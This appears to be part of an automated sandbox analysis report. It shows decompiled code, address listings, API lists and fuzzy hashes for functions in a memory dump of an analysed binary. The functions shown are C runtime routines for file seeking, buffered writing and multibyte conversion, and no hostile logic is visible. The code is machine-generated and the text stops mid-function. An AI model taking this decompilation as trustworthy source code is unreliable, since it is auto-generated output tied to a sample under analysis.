				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}



















                                                                                                                                                  0x00405d00
                                                                                                                                                  0x00405d00
                                                                                                                                                  0x00405d00
                                                                                                                                                  0x00405d01
                                                                                                                                                  0x00405d07
                                                                                                                                                  0x00405e7f
                                                                                                                                                  0x00405e7f
                                                                                                                                                  0x00405e7f
                                                                                                                                                  0x00405e83
                                                                                                                                                  0x00405d0d
                                                                                                                                                  0x00405d0d
                                                                                                                                                  0x00405d14
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d1a
                                                                                                                                                  0x00405d1a
                                                                                                                                                  0x00405d20
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d2f
                                                                                                                                                  0x00405d34
                                                                                                                                                  0x00405d38
                                                                                                                                                  0x00405dad
                                                                                                                                                  0x00405db0
                                                                                                                                                  0x00405db2
                                                                                                                                                  0x00405db2
                                                                                                                                                  0x00405db2
                                                                                                                                                  0x00405db5
                                                                                                                                                  0x00405db7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405dbd
                                                                                                                                                  0x00405dbd
                                                                                                                                                  0x00405dc1
                                                                                                                                                  0x00405df8
                                                                                                                                                  0x00405dfb
                                                                                                                                                  0x00405dfd
                                                                                                                                                  0x00405e04
                                                                                                                                                  0x00405e09
                                                                                                                                                  0x00405e0c
                                                                                                                                                  0x00405e0e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405dff
                                                                                                                                                  0x00405dff
                                                                                                                                                  0x00405e10
                                                                                                                                                  0x00405e10
                                                                                                                                                  0x00405e12
                                                                                                                                                  0x00405e73
                                                                                                                                                  0x00405e78
                                                                                                                                                  0x00405e14
                                                                                                                                                  0x00405e14
                                                                                                                                                  0x00405e18
                                                                                                                                                  0x00405e2e
                                                                                                                                                  0x00405e2e
                                                                                                                                                  0x00405e32
                                                                                                                                                  0x00405e34
                                                                                                                                                  0x00405e37
                                                                                                                                                  0x00405e38
                                                                                                                                                  0x00405e3c
                                                                                                                                                  0x00405e43
                                                                                                                                                  0x00405e45
                                                                                                                                                  0x00405e45
                                                                                                                                                  0x00405e43
                                                                                                                                                  0x00405e4c
                                                                                                                                                  0x00405e4e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e50
                                                                                                                                                  0x00405e50
                                                                                                                                                  0x00405e50
                                                                                                                                                  0x00405e55
                                                                                                                                                  0x00405e57
                                                                                                                                                  0x00405e59
                                                                                                                                                  0x00405e59
                                                                                                                                                  0x00405e61
                                                                                                                                                  0x00405e66
                                                                                                                                                  0x00405e69
                                                                                                                                                  0x00405e6b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e6d
                                                                                                                                                  0x00405e6f
                                                                                                                                                  0x00405e71
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e71
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e50
                                                                                                                                                  0x00405e1a
                                                                                                                                                  0x00405e1f
                                                                                                                                                  0x00405e24
                                                                                                                                                  0x00405e27
                                                                                                                                                  0x00405e2a
                                                                                                                                                  0x00405e2c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e2c
                                                                                                                                                  0x00405e18
                                                                                                                                                  0x00405e12
                                                                                                                                                  0x00405dc3
                                                                                                                                                  0x00405dc9
                                                                                                                                                  0x00405dcb
                                                                                                                                                  0x00405dcc
                                                                                                                                                  0x00405dcd
                                                                                                                                                  0x00405dd4
                                                                                                                                                  0x00405ddb
                                                                                                                                                  0x00405ddd
                                                                                                                                                  0x00405de5
                                                                                                                                                  0x00405de7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405ded
                                                                                                                                                  0x00405ded
                                                                                                                                                  0x00405df0
                                                                                                                                                  0x00405df7
                                                                                                                                                  0x00405df7
                                                                                                                                                  0x00405de7
                                                                                                                                                  0x00405dc1
                                                                                                                                                  0x00405d3a
                                                                                                                                                  0x00405d3c
                                                                                                                                                  0x00405d3e
                                                                                                                                                  0x00405d3e
                                                                                                                                                  0x00405d43
                                                                                                                                                  0x00405e79
                                                                                                                                                  0x00405e7a
                                                                                                                                                  0x00405e7a
                                                                                                                                                  0x00405e7e
                                                                                                                                                  0x00405d49
                                                                                                                                                  0x00405d4d
                                                                                                                                                  0x00405d77
                                                                                                                                                  0x00405d79
                                                                                                                                                  0x00405da7
                                                                                                                                                  0x00405dac
                                                                                                                                                  0x00405d7b
                                                                                                                                                  0x00405d80
                                                                                                                                                  0x00405d80
                                                                                                                                                  0x00405d87
                                                                                                                                                  0x00405d89
                                                                                                                                                  0x00405d89
                                                                                                                                                  0x00405d91
                                                                                                                                                  0x00405d96
                                                                                                                                                  0x00405d9b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405da1
                                                                                                                                                  0x00405da5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405da5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d80
                                                                                                                                                  0x00405d4f
                                                                                                                                                  0x00405d54
                                                                                                                                                  0x00405d59
                                                                                                                                                  0x00405d5c
                                                                                                                                                  0x00405d61
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d67
                                                                                                                                                  0x00405d6f
                                                                                                                                                  0x00405d74
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405d74
                                                                                                                                                  0x00405d61
                                                                                                                                                  0x00405d4d
                                                                                                                                                  0x00405d43
                                                                                                                                                  0x00405d38
                                                                                                                                                  0x00405d20
                                                                                                                                                  0x00405d14
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _fseek_malloc_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 208892515-0
                                                                                                                                                  • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                  • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                  • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                  • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040BAAA, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}





























                                                                                                                                                  0x0040baaa
                                                                                                                                                  0x0040baba
                                                                                                                                                  0x0040bae0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bac1
                                                                                                                                                  0x0040bac1
                                                                                                                                                  0x0040bac4
                                                                                                                                                  0x0040bac6
                                                                                                                                                  0x0040bae7
                                                                                                                                                  0x0040baea
                                                                                                                                                  0x0040baec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040baee
                                                                                                                                                  0x0040baf3
                                                                                                                                                  0x0040baf6
                                                                                                                                                  0x0040baf9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bafe
                                                                                                                                                  0x0040bb02
                                                                                                                                                  0x0040bb09
                                                                                                                                                  0x0040bb0c
                                                                                                                                                  0x0040bb0f
                                                                                                                                                  0x0040bb11
                                                                                                                                                  0x0040bb1b
                                                                                                                                                  0x0040bb13
                                                                                                                                                  0x0040bb16
                                                                                                                                                  0x0040bb16
                                                                                                                                                  0x0040bb22
                                                                                                                                                  0x0040bb24
                                                                                                                                                  0x0040bbe9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb2a
                                                                                                                                                  0x0040bb2a
                                                                                                                                                  0x0040bb2d
                                                                                                                                                  0x0040bb2d
                                                                                                                                                  0x0040bb33
                                                                                                                                                  0x0040bb64
                                                                                                                                                  0x0040bb64
                                                                                                                                                  0x0040bb67
                                                                                                                                                  0x0040bbc0
                                                                                                                                                  0x0040bbc7
                                                                                                                                                  0x0040bbca
                                                                                                                                                  0x0040bbf5
                                                                                                                                                  0x0040bbf5
                                                                                                                                                  0x0040bbf7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbfb
                                                                                                                                                  0x0040bbcc
                                                                                                                                                  0x0040bbcf
                                                                                                                                                  0x0040bbd2
                                                                                                                                                  0x0040bbd3
                                                                                                                                                  0x0040bbd6
                                                                                                                                                  0x0040bbd8
                                                                                                                                                  0x0040bbda
                                                                                                                                                  0x0040bbda
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbd8
                                                                                                                                                  0x0040bb69
                                                                                                                                                  0x0040bb6b
                                                                                                                                                  0x0040bb78
                                                                                                                                                  0x0040bb78
                                                                                                                                                  0x0040bb7c
                                                                                                                                                  0x0040bb7e
                                                                                                                                                  0x0040bb82
                                                                                                                                                  0x0040bb84
                                                                                                                                                  0x0040bb87
                                                                                                                                                  0x0040bb87
                                                                                                                                                  0x0040bb87
                                                                                                                                                  0x0040bb89
                                                                                                                                                  0x0040bb8a
                                                                                                                                                  0x0040bb94
                                                                                                                                                  0x0040bb95
                                                                                                                                                  0x0040bb9a
                                                                                                                                                  0x0040bb9d
                                                                                                                                                  0x0040bba0
                                                                                                                                                  0x0040bc03
                                                                                                                                                  0x0040bc03
                                                                                                                                                  0x0040bc07
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bba2
                                                                                                                                                  0x0040bba2
                                                                                                                                                  0x0040bba4
                                                                                                                                                  0x0040bba6
                                                                                                                                                  0x0040bba8
                                                                                                                                                  0x0040bba8
                                                                                                                                                  0x0040bbaa
                                                                                                                                                  0x0040bbad
                                                                                                                                                  0x0040bbaf
                                                                                                                                                  0x0040bbb1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbb3
                                                                                                                                                  0x0040bbb3
                                                                                                                                                  0x0040bbb3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbb3
                                                                                                                                                  0x0040bbb1
                                                                                                                                                  0x0040bba0
                                                                                                                                                  0x0040bb6e
                                                                                                                                                  0x0040bb74
                                                                                                                                                  0x0040bb76
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb76
                                                                                                                                                  0x0040bb35
                                                                                                                                                  0x0040bb38
                                                                                                                                                  0x0040bb3a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb3c
                                                                                                                                                  0x0040bbf1
                                                                                                                                                  0x0040bbf1
                                                                                                                                                  0x0040bbf1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbf1
                                                                                                                                                  0x0040bb42
                                                                                                                                                  0x0040bb44
                                                                                                                                                  0x0040bb46
                                                                                                                                                  0x0040bb48
                                                                                                                                                  0x0040bb48
                                                                                                                                                  0x0040bb50
                                                                                                                                                  0x0040bb55
                                                                                                                                                  0x0040bb58
                                                                                                                                                  0x0040bb5a
                                                                                                                                                  0x0040bb5d
                                                                                                                                                  0x0040bb5f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bbe1
                                                                                                                                                  0x0040bbe1
                                                                                                                                                  0x0040bbe1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bb2a
                                                                                                                                                  0x0040bb24
                                                                                                                                                  0x0040bac8
                                                                                                                                                  0x0040bac8
                                                                                                                                                  0x0040bacd
                                                                                                                                                  0x0040bace
                                                                                                                                                  0x0040bacf
                                                                                                                                                  0x0040bad0
                                                                                                                                                  0x0040bad1
                                                                                                                                                  0x0040bad2
                                                                                                                                                  0x0040bad8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040badd

                                                                                                                                                  APIs
                                                                                                                                                  • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                  • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                  • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                  • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                    • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                    • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3240763771-0
                                                                                                                                                  • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                  • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                  • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                  • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0041529F, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                  0x004152a9
                                                                                                                                                  0x004152b0
                                                                                                                                                  0x004152c7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004152b7
                                                                                                                                                  0x004152b9
                                                                                                                                                  0x004152d3
                                                                                                                                                  0x004152d8
                                                                                                                                                  0x004152db
                                                                                                                                                  0x004152de
                                                                                                                                                  0x00415307
                                                                                                                                                  0x0041530e
                                                                                                                                                  0x00415310
                                                                                                                                                  0x00415391
                                                                                                                                                  0x004153ac
                                                                                                                                                  0x004153ae
                                                                                                                                                  0x004152ee
                                                                                                                                                  0x004152ee
                                                                                                                                                  0x004152f1
                                                                                                                                                  0x004152f3
                                                                                                                                                  0x004152f6
                                                                                                                                                  0x004152f6
                                                                                                                                                  0x004152f6
                                                                                                                                                  0x004152f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004152fc
                                                                                                                                                  0x00415370
                                                                                                                                                  0x00415370
                                                                                                                                                  0x00415375
                                                                                                                                                  0x0041537b
                                                                                                                                                  0x0041537e
                                                                                                                                                  0x00415380
                                                                                                                                                  0x00415383
                                                                                                                                                  0x00415383
                                                                                                                                                  0x00415383
                                                                                                                                                  0x00415383
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415387
                                                                                                                                                  0x00415312
                                                                                                                                                  0x00415315
                                                                                                                                                  0x0041531b
                                                                                                                                                  0x0041531e
                                                                                                                                                  0x00415345
                                                                                                                                                  0x00415348
                                                                                                                                                  0x0041534e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415350
                                                                                                                                                  0x00415353
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415355
                                                                                                                                                  0x00415355
                                                                                                                                                  0x0041535b
                                                                                                                                                  0x0041535e
                                                                                                                                                  0x004152cc
                                                                                                                                                  0x004152cc
                                                                                                                                                  0x00415367
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415367
                                                                                                                                                  0x00415320
                                                                                                                                                  0x00415323
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415327
                                                                                                                                                  0x00415338
                                                                                                                                                  0x0041533e
                                                                                                                                                  0x00415340
                                                                                                                                                  0x00415343
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415343
                                                                                                                                                  0x004152e0
                                                                                                                                                  0x004152e3
                                                                                                                                                  0x004152e5
                                                                                                                                                  0x004152eb
                                                                                                                                                  0x004152eb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004152bb
                                                                                                                                                  0x004152bb
                                                                                                                                                  0x004152c0
                                                                                                                                                  0x004152c4
                                                                                                                                                  0x004152c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004152c0
                                                                                                                                                  0x004152b9

                                                                                                                                                  APIs
                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                  • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                  • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                  • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                  • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004134DB, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
